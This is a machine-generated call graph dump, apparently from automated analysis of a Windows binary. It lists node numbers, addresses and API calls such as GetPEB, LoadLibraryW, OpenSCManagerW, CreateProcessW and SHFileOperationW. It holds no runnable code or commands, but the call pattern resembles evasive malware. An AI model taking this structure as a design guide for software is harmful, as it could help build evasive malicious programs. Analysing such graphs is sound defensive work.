2a61e0 6049->6207 6219 2a94d0 6049->6219 6226 2a3310 6049->6226 6236 2a1840 6049->6236 6251 2a3460 6049->6251 6261 2a53d0 6049->6261 6266 2a9270 6049->6266 6276 2a8bb0 6049->6276 6286 2a72d0 6049->6286 6296 2a9050 6049->6296 6310 2a4770 6049->6310 6327 2ab1d0 6049->6327 6332 2a7410 6049->6332 6054 2a84e3 6050->6054 6051 2a85bd 6051->6049 6052 2a8600 CreateFileW 6052->6051 6052->6054 6053 2a3f00 GetPEB 6053->6054 6054->6051 6054->6052 6054->6053 6055 2a3e60 GetPEB 6054->6055 6055->6054 6061 2a7125 6056->6061 6057 2a7233 6365 2a34c0 6057->6365 6059 2a7232 6059->6049 6061->6057 6061->6059 6064 2a7080 GetPEB LoadLibraryW 6061->6064 6062 2a7265 LoadLibraryW 6065 2a727a 6062->6065 6066 2a7290 6062->6066 6063 2a3f00 GetPEB 6067 2a7254 6063->6067 6064->6061 6068 2a3f00 GetPEB 6065->6068 6072 2a72b8 6066->6072 6074 2a3f00 GetPEB 6066->6074 6069 2a3e60 GetPEB 6067->6069 6070 2a7284 6068->6070 6073 2a7260 6069->6073 6071 2a3e60 GetPEB 6070->6071 6071->6066 6072->6049 6073->6062 6075 2a72ac 6074->6075 6076 2a3e60 GetPEB 6075->6076 6076->6072 6078 2a8ea0 6077->6078 6079 2a901b 6078->6079 6080 2a8ff2 OpenServiceW 6078->6080 6081 2a8fc6 6078->6081 6083 2a3f00 GetPEB 6078->6083 6086 2a3e60 GetPEB 6078->6086 6079->6081 6082 2a3f00 GetPEB 6079->6082 6080->6078 6081->6049 6084 2a902e 6082->6084 6083->6078 6085 2a3e60 GetPEB 6084->6085 6085->6081 6086->6078 6096 2a8991 6087->6096 6088 2a8b74 6092 2a8add 6088->6092 6094 2a3f00 GetPEB 6088->6094 6090 2a3f00 GetPEB 6090->6096 6091 2a34c0 GetPEB 6091->6096 6092->6049 6093 2a3e60 GetPEB 6093->6096 6095 2a8b87 6094->6095 6097 2a3e60 GetPEB 6095->6097 6096->6088 6096->6090 6096->6091 6096->6092 6096->6093 6098 2a3460 GetPEB 6096->6098 6375 2a5040 6096->6375 6097->6092 6098->6096 6100 2a8163 6099->6100 6101 2a34c0 GetPEB 6100->6101 6102 2a8397 CreateFileW 6100->6102 6104 2a83c7 6100->6104 6106 2a8358 6100->6106 6109 2a3e60 GetPEB 6100->6109 6112 2a3f00 GetPEB 6100->6112 6101->6100 6102->6100 6103 2a83ee 6102->6103 6103->6049 6105 2a83eb CloseHandle 6104->6105 6107 2a3f00 GetPEB 6104->6107 6105->6103 6106->6049 6108 2a83da 6107->6108 6110 2a3e60 GetPEB 6108->6110 6109->6100 6111 2a83e6 6110->6111 6111->6105 6112->6100 6127 2a9880 6113->6127 6114 2a9b02 6116 2a9b26 SHGetFolderPathW 6114->6116 6119 2a3f00 GetPEB 6114->6119 6115 2a99b2 OpenSCManagerW 6115->6127 6400 2a3040 6116->6400 6118 2a9969 SHGetFolderPathW 6118->6127 6123 2a9b15 6119->6123 6120 2a9a66 CloseServiceHandle 6120->6127 6122 2a3f00 GetPEB 6122->6127 6125 2a3e60 GetPEB 6123->6125 6124 2a9af5 6124->6049 6126 2a9b21 6125->6126 6126->6116 6127->6114 6127->6115 6127->6118 6127->6120 6127->6122 6127->6124 6128 2a3e60 GetPEB 6127->6128 6405 2a7c60 6127->6405 6128->6127 6130 2a9630 6129->6130 6131 2a9829 6130->6131 6132 2a34c0 GetPEB 6130->6132 6133 2a981f 6130->6133 6136 2a3e60 GetPEB 6130->6136 6137 2a3f00 GetPEB 6130->6137 6429 2a3780 6131->6429 6132->6130 6133->6049 6135 2a9839 6135->6049 6136->6130 6137->6130 6140 2a12e1 6138->6140 6141 2a181c 6140->6141 6142 2a4220 GetPEB 6140->6142 6144 2a34c0 GetPEB 6140->6144 6145 2a42c0 GetPEB 6140->6145 6147 2a17d1 6140->6147 6150 2a3e60 GetPEB 6140->6150 6152 2a3f00 GetPEB 6140->6152 6153 2a1641 _snwprintf 6140->6153 6158 2a3460 GetPEB 6140->6158 6456 2a1fc0 6140->6456 6464 2a1e70 6140->6464 6473 2a5c00 6140->6473 6492 2a1c70 6140->6492 6508 2a2230 6140->6508 6516 2a2be0 6140->6516 6531 2a4ea0 6140->6531 6536 2a1900 6140->6536 6558 2a4220 6141->6558 6142->6140 6144->6140 6145->6140 6147->6049 6150->6140 6152->6140 6156 2a3460 GetPEB 6153->6156 6156->6140 6158->6140 6160 2aaff8 6159->6160 6162 2ab101 6159->6162 6161 2a3f00 GetPEB 6160->6161 6160->6162 6163 2a3e60 GetPEB 6160->6163 6161->6160 6162->6049 6163->6160 6165 2a8709 6164->6165 6166 2a871f 6164->6166 6167 2a3f00 GetPEB 6165->6167 6166->6049 6168 2a8713 6167->6168 6169 2a3e60 GetPEB 6168->6169 6169->6166 6600 2a5500 6170->6600 6172 2a613c 6174 2a35c0 GetPEB 6172->6174 6173 2a6134 6173->6049 6176 2a6147 6174->6176 6175 2a3f00 GetPEB 6181 2a6074 6175->6181 6177 2a6168 6176->6177 6179 2a3f00 GetPEB 6176->6179 6183 2a61a2 6177->6183 6184 2a3f00 GetPEB 6177->6184 6178 2a3e60 GetPEB 6178->6181 6180 2a615c 6179->6180 6182 2a3e60 GetPEB 6180->6182 6181->6172 6181->6173 6181->6175 6181->6178 6182->6177 6187 2a3f00 GetPEB 6183->6187 6189 2a61ca 6183->6189 6185 2a6196 6184->6185 6186 2a3e60 GetPEB 6185->6186 6186->6183 6188 2a61be 6187->6188 6190 2a3e60 GetPEB 6188->6190 6189->6049 6190->6189 6193 2ab440 6191->6193 6192 2ab4ba 6192->6049 6193->6192 6610 2aab50 6193->6610 6626 2aa170 6193->6626 6647 2aa7a0 6193->6647 6667 2aa5e0 6193->6667 6205 2a9f40 6198->6205 6199 2aa01b 6201 2a9f64 6199->6201 6202 2a3f00 GetPEB 6199->6202 6200 2a3f00 GetPEB 6200->6205 6201->6049 6203 2aa02e 6202->6203 6204 2a3e60 GetPEB 6203->6204 6204->6201 6205->6199 6205->6200 6205->6201 6206 2a3e60 GetPEB 6205->6206 6206->6205 6215 2a6202 6207->6215 6209 2a42c0 GetPEB 6209->6215 6210 2a624b 6210->6049 6212 2a6490 6212->6049 6213 2a3e60 GetPEB 6213->6215 6214 2a3f00 GetPEB 6214->6215 6215->6209 6215->6210 6215->6213 6215->6214 6217 2a642d 6215->6217 6782 2a55b0 6215->6782 6791 2a4c80 6215->6791 6216 2a3f00 GetPEB 6216->6217 6217->6212 6217->6216 6218 2a3e60 GetPEB 6217->6218 6218->6217 6222 2a94f0 6219->6222 6220 2a95c2 6220->6049 6222->6220 6223 2a4c80 GetPEB 6222->6223 6224 2a3f00 GetPEB 6222->6224 6225 2a3e60 GetPEB 6222->6225 6800 2a46c0 6222->6800 6223->6222 6224->6222 6225->6222 6227 2a334a 6226->6227 6228 2a336f 6227->6228 6229 2a3f00 GetPEB 6227->6229 6232 2a3f00 GetPEB 6228->6232 6235 2a3397 6228->6235 6230 2a3363 6229->6230 6231 2a3e60 GetPEB 6230->6231 6231->6228 6233 2a338b 6232->6233 6234 2a3e60 GetPEB 6233->6234 6234->6235 6235->6049 6237 2a184c 6236->6237 6241 2a1862 6236->6241 6238 2a3f00 GetPEB 6237->6238 6239 2a1856 6238->6239 6240 2a3e60 GetPEB 6239->6240 6240->6241 6242 2a3f00 GetPEB 6241->6242 6244 2a188b 6241->6244 6243 2a187f 6242->6243 6245 2a3e60 GetPEB 6243->6245 6246 2a18ee 6244->6246 6815 2a25e0 6244->6815 6245->6244 6246->6049 6248 2a18d8 6249 2a18dc 6248->6249 6250 2a4220 GetPEB 6248->6250 6249->6049 6250->6246 6252 2a346d 6251->6252 6255 2a3483 6251->6255 6253 2a3f00 GetPEB 6252->6253 6254 2a3477 6253->6254 6256 2a3e60 GetPEB 6254->6256 6257 2a34ab 6255->6257 6258 2a3f00 GetPEB 6255->6258 6256->6255 6257->6049 6259 2a349f 6258->6259 6260 2a3e60 GetPEB 6259->6260 6260->6257 6263 2a53e0 6261->6263 6262 2a54b4 6262->6049 6263->6262 6264 2a3f00 GetPEB 6263->6264 6265 2a3e60 GetPEB 6263->6265 6264->6263 6265->6263 6273 2a9290 6266->6273 6268 2a949c 6269 2a9410 6268->6269 6270 2a3f00 GetPEB 6268->6270 6269->6049 6272 2a94af 6270->6272 6271 2a3f00 GetPEB 6271->6273 6274 2a3e60 GetPEB 6272->6274 6273->6268 6273->6269 6273->6271 6275 2a3e60 GetPEB 6273->6275 6830 2a1000 6273->6830 6274->6269 6275->6273 6283 2a8bc4 6276->6283 6277 2a8d1d 6839 2a36b0 6277->6839 6278 2a3780 2 API calls 6278->6283 6280 2a8d10 6280->6049 6282 2a34c0 GetPEB 6282->6283 6283->6277 6283->6278 6283->6280 6283->6282 6284 2a3e60 GetPEB 6283->6284 6285 2a3f00 GetPEB 6283->6285 6284->6283 6285->6283 6287 2a72d9 6286->6287 6288 2a72ef 6286->6288 6289 2a3f00 GetPEB 6287->6289 6291 2a7318 6288->6291 6293 2a3f00 GetPEB 6288->6293 6290 2a72e3 6289->6290 6292 2a3e60 GetPEB 6290->6292 6291->6049 6292->6288 6294 2a730c 6293->6294 6295 2a3e60 GetPEB 6294->6295 6295->6291 6309 2a9070 6296->6309 6297 2a91de 6297->6049 6298 2a91e4 6299 2a921f 6298->6299 6300 2a3f00 GetPEB 6298->6300 6304 2a9247 6299->6304 6306 2a3f00 GetPEB 6299->6306 6302 2a9213 6300->6302 6301 2a3f00 GetPEB 6301->6309 6305 2a3e60 GetPEB 6302->6305 6303 2a3e60 GetPEB 6303->6309 6304->6049 6305->6299 6307 2a923b 6306->6307 6308 2a3e60 GetPEB 6307->6308 6308->6304 6309->6297 6309->6298 6309->6301 6309->6303 6311 2a4785 6310->6311 6319 2a479b 6310->6319 6312 2a3f00 GetPEB 6311->6312 6314 2a478f 6312->6314 6313 2a47cb GetCurrentProcessId 6316 2a47d5 6313->6316 6317 2a3e60 GetPEB 6314->6317 6315 2a3f00 GetPEB 6318 2a47b7 6315->6318 6316->6049 6317->6319 6320 2a3e60 GetPEB 6318->6320 6319->6313 6319->6315 6321 2a47c3 6320->6321 6321->6313 6324 2ab2ec 6322->6324 6323 2a3f00 GetPEB 6323->6324 6324->6323 6325 2ab422 6324->6325 6326 2a3e60 GetPEB 6324->6326 6325->6009 6326->6324 6329 2ab1e0 6327->6329 6328 2ab2b2 6328->6049 6328->6328 6329->6328 6330 2a3e60 GetPEB 6329->6330 6331 2a3f00 GetPEB 6329->6331 6330->6329 6331->6329 6337 2a7420 6332->6337 6333 2a7608 6333->6049 6334 2a3f00 GetPEB 6334->6337 6335 2a3e60 GetPEB 6335->6337 6336 2a4fd0 GetPEB 6336->6337 6337->6333 6337->6334 6337->6335 6337->6336 6346 2a8d50 6338->6346 6339 2a8e3f 6340 2a4b70 2 API calls 6339->6340 6341 2a8e4f 6340->6341 6341->6035 6342 2a34c0 GetPEB 6342->6346 6343 2a8e29 6343->6035 6344 2a3e60 GetPEB 6344->6346 6345 2a3f00 GetPEB 6345->6346 6346->6339 6346->6342 6346->6343 6346->6344 6346->6345 6355 2a8753 6347->6355 6348 2a34c0 GetPEB 6348->6355 6349 2a88df 6349->6027 6350 2a8903 6353 2a3f00 GetPEB 6350->6353 6357 2a8922 6350->6357 6352 2a3f00 GetPEB 6352->6355 6356 2a8916 6353->6356 6354 2a8e80 2 API calls 6354->6355 6355->6348 6355->6349 6355->6350 6355->6352 6355->6354 6361 2a3780 2 API calls 6355->6361 6364 2a3e60 GetPEB 6355->6364 6858 2a7700 6355->6858 6358 2a3e60 GetPEB 6356->6358 6359 2a8955 6357->6359 6360 2a3f00 GetPEB 6357->6360 6358->6357 6359->6027 6362 2a8949 6360->6362 6361->6355 6363 2a3e60 GetPEB 6362->6363 6363->6359 6364->6355 6366 2a34e3 6365->6366 6367 2a3508 6366->6367 6368 2a3f00 GetPEB 6366->6368 6371 2a3f00 GetPEB 6367->6371 6374 2a3530 6367->6374 6369 2a34fc 6368->6369 6370 2a3e60 GetPEB 6369->6370 6370->6367 6372 2a3524 6371->6372 6373 2a3e60 GetPEB 6372->6373 6373->6374 6374->6062 6374->6063 6389 2a505c 6375->6389 6376 2a5367 6378 2a3f00 GetPEB 6376->6378 6380 2a5386 6376->6380 6377 2a53ae 6377->6096 6379 2a537a 6378->6379 6381 2a3e60 GetPEB 6379->6381 6380->6377 6384 2a3f00 GetPEB 6380->6384 6381->6380 6382 2a534d RtlAllocateHeap 6382->6377 6382->6389 6386 2a53a2 6384->6386 6385 2a3f00 GetPEB 6385->6389 6387 2a3e60 GetPEB 6386->6387 6387->6377 6388 2a3e60 GetPEB 6388->6389 6389->6376 6389->6377 6389->6382 6389->6385 6389->6388 6390 2a42c0 6389->6390 6391 2a42cd 6390->6391 6397 2a42e3 6390->6397 6392 2a3f00 GetPEB 6391->6392 6393 2a42d7 6392->6393 6395 2a3e60 GetPEB 6393->6395 6394 2a430b 6394->6389 6395->6397 6396 2a3f00 GetPEB 6398 2a42ff 6396->6398 6397->6394 6397->6396 6399 2a3e60 GetPEB 6398->6399 6399->6394 6401 2a3050 6400->6401 6403 2a307a 6401->6403 6415 2a38f0 6401->6415 6403->6124 6404 2a3092 6404->6124 6406 2a7c80 6405->6406 6407 2a7d97 6406->6407 6408 2a7ddd 6406->6408 6409 2a3f00 GetPEB 6406->6409 6412 2a3e60 GetPEB 6406->6412 6407->6127 6410 2a3f00 GetPEB 6408->6410 6414 2a7dfd 6408->6414 6409->6406 6411 2a7df1 6410->6411 6413 2a3e60 GetPEB 6411->6413 6412->6406 6413->6414 6414->6127 6427 2a3910 6415->6427 6416 2a3a3b FindFirstFileW 6419 2a3b8f 6416->6419 6416->6427 6417 2a3ac1 6417->6404 6418 2a3b70 6418->6419 6420 2a3f00 GetPEB 6418->6420 6419->6404 6421 2a3b83 6420->6421 6422 2a3e60 GetPEB 6421->6422 6422->6419 6423 2a34c0 GetPEB 6423->6427 6424 2a3e60 GetPEB 6424->6427 6425 2a3f00 GetPEB 6425->6427 6426 2a38f0 GetPEB 6426->6427 6427->6416 6427->6417 6427->6418 6427->6423 6427->6424 6427->6425 6427->6426 6428 2a3460 GetPEB 6427->6428 6428->6427 6430 2a37ab 6429->6430 6431 2a3795 6429->6431 6435 2a37dd 6430->6435 6436 2a3f00 GetPEB 6430->6436 6432 2a3f00 GetPEB 6431->6432 6433 2a379f 6432->6433 6434 2a3e60 GetPEB 6433->6434 6434->6430 6439 2a3812 6435->6439 6440 2a3f00 GetPEB 6435->6440 6437 2a37d1 6436->6437 6438 2a3e60 GetPEB 6437->6438 6438->6435 6443 2a384a 6439->6443 6444 2a3f00 GetPEB 6439->6444 6441 2a3806 6440->6441 6442 2a3e60 GetPEB 6441->6442 6442->6439 6447 2a3876 6443->6447 6448 2a3f00 GetPEB 6443->6448 6445 2a383e 6444->6445 6446 2a3e60 GetPEB 6445->6446 6446->6443 6451 2a38d1 SHFileOperationW 6447->6451 6452 2a3f00 GetPEB 6447->6452 6449 2a386a 6448->6449 6450 2a3e60 GetPEB 6449->6450 6450->6447 6451->6135 6453 2a38c0 6452->6453 6454 2a3e60 GetPEB 6453->6454 6455 2a38cc 6454->6455 6455->6451 6463 2a1fd2 6456->6463 6457 2a2212 6458 2a2208 6457->6458 6459 2a4220 GetPEB 6457->6459 6458->6140 6459->6458 6460 2a3e60 GetPEB 6460->6463 6461 2a42c0 GetPEB 6461->6463 6462 2a3f00 GetPEB 6462->6463 6463->6457 6463->6458 6463->6460 6463->6461 6463->6462 6472 2a1e86 6464->6472 6465 2a1f77 6466 2a3f00 GetPEB 6465->6466 6468 2a1f68 6465->6468 6467 2a1f98 6466->6467 6469 2a3e60 GetPEB 6467->6469 6468->6140 6469->6468 6470 2a3e60 GetPEB 6470->6472 6471 2a3f00 GetPEB 6471->6472 6472->6465 6472->6468 6472->6470 6472->6471 6474 2a5c26 6473->6474 6475 2a5c10 6473->6475 6479 2a3f00 GetPEB 6474->6479 6483 2a5c4e 6474->6483 6476 2a3f00 GetPEB 6475->6476 6477 2a5c1a 6476->6477 6478 2a3e60 GetPEB 6477->6478 6478->6474 6480 2a5c42 6479->6480 6481 2a3e60 GetPEB 6480->6481 6481->6483 6482 2a5cd2 6482->6140 6483->6482 6484 2a5c99 6483->6484 6485 2a3f00 GetPEB 6483->6485 6487 2a5cc1 6484->6487 6489 2a3f00 GetPEB 6484->6489 6486 2a5c8d 6485->6486 6488 2a3e60 GetPEB 6486->6488 6487->6140 6488->6484 6490 2a5cb5 6489->6490 6491 2a3e60 GetPEB 6490->6491 6491->6487 6493 2a1cf0 6492->6493 6496 2a1d06 6492->6496 6494 2a3f00 GetPEB 6493->6494 6495 2a1cfa 6494->6495 6497 2a3e60 GetPEB 6495->6497 6498 2a1dad 6496->6498 6499 2a3f00 GetPEB 6496->6499 6497->6496 6502 2a1de1 6498->6502 6503 2a3f00 GetPEB 6498->6503 6500 2a1da1 6499->6500 6501 2a3e60 GetPEB 6500->6501 6501->6498 6506 2a4ea0 GetPEB 6502->6506 6504 2a1dd5 6503->6504 6505 2a3e60 GetPEB 6504->6505 6505->6502 6507 2a1e15 6506->6507 6507->6140 6515 2a2255 6508->6515 6509 2a229c 6509->6140 6510 2a3f00 GetPEB 6510->6515 6511 2a25be 6512 2a25cd 6511->6512 6514 2a4220 GetPEB 6511->6514 6512->6140 6513 2a3e60 GetPEB 6513->6515 6514->6512 6515->6509 6515->6510 6515->6511 6515->6513 6529 2a2c1a 6516->6529 6518 2a2fcf 6520 2a2fee 6518->6520 6521 2a3f00 GetPEB 6518->6521 6519 2a2cae 6519->6140 6520->6140 6524 2a2fe2 6521->6524 6522 2a3f00 GetPEB 6522->6529 6523 2a34c0 GetPEB 6523->6529 6525 2a3e60 GetPEB 6524->6525 6525->6520 6526 2a3e60 GetPEB 6526->6529 6527 2a4220 GetPEB 6527->6529 6528 2a3460 GetPEB 6528->6529 6529->6518 6529->6519 6529->6522 6529->6523 6529->6526 6529->6527 6529->6528 6568 2a56f0 6529->6568 6577 2a2980 6529->6577 6534 2a4eb6 6531->6534 6532 2a4f3d 6532->6140 6533 2a3f00 GetPEB 6533->6534 6534->6532 6534->6533 6535 2a3e60 GetPEB 6534->6535 6535->6534 6557 2a191f 6536->6557 6537 2a1bc6 6538 2a35c0 GetPEB 6537->6538 6540 2a1bd0 6538->6540 6539 2a1ba4 6539->6140 6541 2a1bf1 6540->6541 6542 2a3f00 GetPEB 6540->6542 6546 2a1c23 6541->6546 6547 2a3f00 GetPEB 6541->6547 6544 2a1be5 6542->6544 6543 2a3e60 GetPEB 6543->6557 6545 2a3e60 GetPEB 6544->6545 6545->6541 6549 2a1c4b 6546->6549 6552 2a3f00 GetPEB 6546->6552 6548 2a1c17 6547->6548 6551 2a3e60 GetPEB 6548->6551 6549->6140 6550 2a3f00 GetPEB 6550->6557 6551->6546 6554 2a1c3f 6552->6554 6553 2a4e30 GetPEB 6553->6557 6555 2a3e60 GetPEB 6554->6555 6555->6549 6557->6537 6557->6539 6557->6543 6557->6550 6557->6553 6590 2a35c0 6557->6590 6559 2a422d 6558->6559 6564 2a4243 6558->6564 6560 2a3f00 GetPEB 6559->6560 6561 2a4237 6560->6561 6562 2a3e60 GetPEB 6561->6562 6562->6564 6563 2a426b 6563->6147 6564->6563 6565 2a3f00 GetPEB 6564->6565 6566 2a425f 6565->6566 6567 2a3e60 GetPEB 6566->6567 6567->6563 6576 2a5701 6568->6576 6569 2a57e3 6571 2a5723 6569->6571 6572 2a3f00 GetPEB 6569->6572 6570 2a3f00 GetPEB 6570->6576 6571->6529 6573 2a57f6 6572->6573 6575 2a3e60 GetPEB 6573->6575 6574 2a3e60 GetPEB 6574->6576 6575->6571 6576->6569 6576->6570 6576->6571 6576->6574 6578 2a29a0 6577->6578 6579 2a2abf 6578->6579 6580 2a3f00 GetPEB 6578->6580 6581 2a3e60 GetPEB 6578->6581 6582 2a3f00 GetPEB 6579->6582 6584 2a2ae4 6579->6584 6586 2a2b0c 6579->6586 6580->6578 6581->6578 6583 2a2ad8 6582->6583 6585 2a3e60 GetPEB 6583->6585 6584->6586 6587 2a3f00 GetPEB 6584->6587 6585->6584 6586->6529 6588 2a2b00 6587->6588 6589 2a3e60 GetPEB 6588->6589 6589->6586 6591 2a35e4 6590->6591 6592 2a3609 6591->6592 6593 2a3f00 GetPEB 6591->6593 6596 2a3f00 GetPEB 6592->6596 6599 2a3631 6592->6599 6594 2a35fd 6593->6594 6595 2a3e60 GetPEB 6594->6595 6595->6592 6597 2a3625 6596->6597 6598 2a3e60 GetPEB 6597->6598 6598->6599 6599->6557 6601 2a5516 6600->6601 6606 2a552c 6600->6606 6602 2a3f00 GetPEB 6601->6602 6603 2a5520 6602->6603 6604 2a3e60 GetPEB 6603->6604 6604->6606 6605 2a5586 6605->6181 6606->6605 6607 2a3f00 GetPEB 6606->6607 6608 2a557a 6607->6608 6609 2a3e60 GetPEB 6608->6609 6609->6605 6618 2aab66 6610->6618 6613 2aab8c 6613->6193 6614 2aac52 6615 2aac71 6614->6615 6616 2a3f00 GetPEB 6614->6616 6619 2aac99 6615->6619 6622 2a3f00 GetPEB 6615->6622 6617 2aac65 6616->6617 6620 2a3e60 GetPEB 6617->6620 6618->6613 6618->6614 6621 2a3f00 GetPEB 6618->6621 6623 2a3e60 GetPEB 6618->6623 6683 2a4b70 6618->6683 6705 2aacd0 6618->6705 6619->6193 6620->6615 6621->6618 6624 2aac8d 6622->6624 6623->6618 6625 2a3e60 GetPEB 6624->6625 6625->6619 6646 2aa189 6626->6646 6627 2aacd0 GetPEB 6627->6646 6628 2aa552 6631 2aa571 6628->6631 6634 2a3f00 GetPEB 6628->6634 6629 2aa439 6629->6193 6637 2aa599 6631->6637 6641 2a3f00 GetPEB 6631->6641 6632 2a4220 GetPEB 6632->6646 6633 2a34c0 GetPEB 6633->6646 6636 2aa565 6634->6636 6635 2a4b70 2 API calls 6635->6646 6639 2a3e60 GetPEB 6636->6639 6637->6193 6638 2a3f00 GetPEB 6638->6646 6639->6631 6642 2aa58d 6641->6642 6644 2a3e60 GetPEB 6642->6644 6643 2a3460 GetPEB 6643->6646 6644->6637 6645 2a3e60 GetPEB 6645->6646 6646->6627 6646->6628 6646->6629 6646->6632 6646->6633 6646->6635 6646->6638 6646->6643 6646->6645 6715 2ab520 6646->6715 6723 2a1150 6646->6723 6666 2aa7c5 6647->6666 6648 2aaa19 6648->6193 6649 2aacd0 GetPEB 6649->6666 6650 2aaa7c GetCurrentProcessId 6650->6666 6651 2aaaec 6660 2aab14 6651->6660 6661 2a3f00 GetPEB 6651->6661 6652 2aaacd 6652->6651 6656 2a3f00 GetPEB 6652->6656 6653 2a4b70 2 API calls 6653->6666 6657 2aaae0 6656->6657 6659 2a3e60 GetPEB 6657->6659 6658 2a42c0 GetPEB 6658->6666 6659->6651 6660->6193 6662 2aab08 6661->6662 6664 2a3e60 GetPEB 6662->6664 6663 2a3e60 GetPEB 6663->6666 6664->6660 6665 2a3f00 GetPEB 6665->6666 6666->6648 6666->6649 6666->6650 6666->6652 6666->6653 6666->6658 6666->6663 6666->6665 6738 2a49a0 6666->6738 6748 2a4850 6666->6748 6668 2aa5ef 6667->6668 6670 2aa710 6668->6670 6671 2aa731 6668->6671 6673 2a3f00 GetPEB 6668->6673 6674 2a42c0 GetPEB 6668->6674 6677 2a3e60 GetPEB 6668->6677 6757 2a4370 6668->6757 6670->6193 6672 2aa750 6671->6672 6675 2a3f00 GetPEB 6671->6675 6678 2aa778 6672->6678 6680 2a3f00 GetPEB 6672->6680 6673->6668 6674->6668 6676 2aa744 6675->6676 6679 2a3e60 GetPEB 6676->6679 6677->6668 6678->6193 6679->6672 6681 2aa76c 6680->6681 6682 2a3e60 GetPEB 6681->6682 6682->6678 6684 2a4b82 6683->6684 6688 2a4b98 6683->6688 6685 2a3f00 GetPEB 6684->6685 6686 2a4b8c 6685->6686 6687 2a3e60 GetPEB 6686->6687 6687->6688 6689 2a4bd7 CreateProcessW 6688->6689 6690 2a3f00 GetPEB 6688->6690 6691 2a4c73 6689->6691 6692 2a4bf7 6689->6692 6693 2a4bc6 6690->6693 6691->6618 6694 2a4bff 6692->6694 6695 2a4c33 6692->6695 6697 2a3f00 GetPEB 6692->6697 6696 2a3e60 GetPEB 6693->6696 6694->6618 6701 2a4c5d 6695->6701 6702 2a3f00 GetPEB 6695->6702 6698 2a4bd2 6696->6698 6699 2a4c27 6697->6699 6698->6689 6700 2a3e60 GetPEB 6699->6700 6700->6695 6701->6618 6703 2a4c51 6702->6703 6704 2a3e60 GetPEB 6703->6704 6704->6701 6713 2aaced 6705->6713 6706 2aaf9f 6709 2aaf37 6706->6709 6710 2a3f00 GetPEB 6706->6710 6707 2a3f00 GetPEB 6707->6713 6708 2a34c0 GetPEB 6708->6713 6709->6618 6711 2aafb2 6710->6711 6714 2a3e60 GetPEB 6711->6714 6712 2a3e60 GetPEB 6712->6713 6713->6706 6713->6707 6713->6708 6713->6709 6713->6712 6714->6709 6722 2ab536 6715->6722 6716 2ab55f 6716->6646 6717 2ab633 6732 2a4fd0 6717->6732 6719 2ab63f 6719->6646 6720 2a3e60 GetPEB 6720->6722 6721 2a3f00 GetPEB 6721->6722 6722->6716 6722->6717 6722->6719 6722->6720 6722->6721 6729 2a1160 6723->6729 6724 2a124c 6725 2a1244 6724->6725 6727 2a3f00 GetPEB 6724->6727 6725->6646 6726 2a3f00 GetPEB 6726->6729 6728 2a125f 6727->6728 6730 2a3e60 GetPEB 6728->6730 6729->6724 6729->6725 6729->6726 6731 2a3e60 GetPEB 6729->6731 6730->6725 6731->6729 6733 2a4ff9 6732->6733 6734 2a500f 6732->6734 6735 2a3f00 GetPEB 6733->6735 6734->6719 6736 2a5003 6735->6736 6737 2a3e60 GetPEB 6736->6737 6737->6734 6747 2a49c0 6738->6747 6739 2a4b37 6740 2a49ea 6739->6740 6741 2a3f00 GetPEB 6739->6741 6740->6666 6743 2a4b4a 6741->6743 6742 2a34c0 GetPEB 6742->6747 6744 2a3e60 GetPEB 6743->6744 6744->6740 6745 2a3e60 GetPEB 6745->6747 6746 2a3f00 GetPEB 6746->6747 6747->6739 6747->6740 6747->6742 6747->6745 6747->6746 6756 2a4870 6748->6756 6749 2a496e 6750 2a492c 6749->6750 6751 2a3f00 GetPEB 6749->6751 6750->6666 6753 2a4981 6751->6753 6752 2a3f00 GetPEB 6752->6756 6754 2a3e60 GetPEB 6753->6754 6754->6750 6755 2a3e60 GetPEB 6755->6756 6756->6749 6756->6750 6756->6752 6756->6755 6758 2a450e 6757->6758 6759 2a4384 6757->6759 6758->6668 6759->6758 6760 2a3f00 GetPEB 6759->6760 6763 2a43d6 6759->6763 6761 2a43ca 6760->6761 6762 2a3e60 GetPEB 6761->6762 6762->6763 6764 2a3f00 GetPEB 6763->6764 6771 2a4436 6763->6771 6776 2a44f4 6763->6776 6765 2a442a 6764->6765 6766 2a3e60 GetPEB 6765->6766 6766->6771 6767 2a44ba 6777 2a4550 6767->6777 6769 2a3f00 GetPEB 6769->6771 6771->6767 6771->6769 6772 2a3e60 GetPEB 6771->6772 6772->6771 6773 2a3f00 GetPEB 6774 2a44e8 6773->6774 6775 2a3e60 GetPEB 6774->6775 6775->6776 6776->6668 6779 2a44d0 6777->6779 6780 2a456b 6777->6780 6778 2a3e60 GetPEB 6778->6780 6779->6773 6779->6776 6780->6778 6780->6779 6781 2a3f00 GetPEB 6780->6781 6781->6780 6790 2a55c6 6782->6790 6783 2a3f00 GetPEB 6783->6790 6784 2a56a8 6785 2a55e8 6784->6785 6786 2a3f00 GetPEB 6784->6786 6785->6215 6787 2a56bb 6786->6787 6789 2a3e60 GetPEB 6787->6789 6788 2a3e60 GetPEB 6788->6790 6789->6785 6790->6783 6790->6784 6790->6785 6790->6788 6799 2a4ca0 6791->6799 6792 2a4d7c 6792->6215 6793 2a4db4 6793->6792 6794 2a3f00 GetPEB 6793->6794 6796 2a4dc7 6794->6796 6795 2a3e60 GetPEB 6795->6799 6798 2a3e60 GetPEB 6796->6798 6797 2a3f00 GetPEB 6797->6799 6798->6792 6799->6792 6799->6793 6799->6795 6799->6797 6801 2a46d7 6800->6801 6806 2a46ed 6800->6806 6802 2a3f00 GetPEB 6801->6802 6803 2a46e1 6802->6803 6804 2a3e60 GetPEB 6803->6804 6804->6806 6805 2a4760 6805->6222 6806->6805 6807 2a3f00 GetPEB 6806->6807 6812 2a4721 6806->6812 6808 2a4715 6807->6808 6810 2a3e60 GetPEB 6808->6810 6809 2a4752 6809->6222 6810->6812 6811 2a3f00 GetPEB 6813 2a4746 6811->6813 6812->6809 6812->6811 6814 2a3e60 GetPEB 6813->6814 6814->6809 6827 2a25f0 6815->6827 6816 2a2771 6816->6248 6817 2a2912 6818 2a2937 6817->6818 6820 2a3f00 GetPEB 6817->6820 6822 2a295f 6818->6822 6825 2a3f00 GetPEB 6818->6825 6819 2a42c0 GetPEB 6819->6827 6821 2a292b 6820->6821 6823 2a3e60 GetPEB 6821->6823 6822->6248 6823->6818 6824 2a3f00 GetPEB 6824->6827 6826 2a2953 6825->6826 6829 2a3e60 GetPEB 6826->6829 6827->6816 6827->6817 6827->6819 6827->6824 6828 2a3e60 GetPEB 6827->6828 6828->6827 6829->6822 6838 2a1010 6830->6838 6831 2a3f00 GetPEB 6831->6838 6832 2a1105 6833 2a103a 6832->6833 6835 2a3f00 GetPEB 6832->6835 6833->6273 6834 2a3e60 GetPEB 6834->6838 6836 2a1118 6835->6836 6837 2a3e60 GetPEB 6836->6837 6837->6833 6838->6831 6838->6832 6838->6833 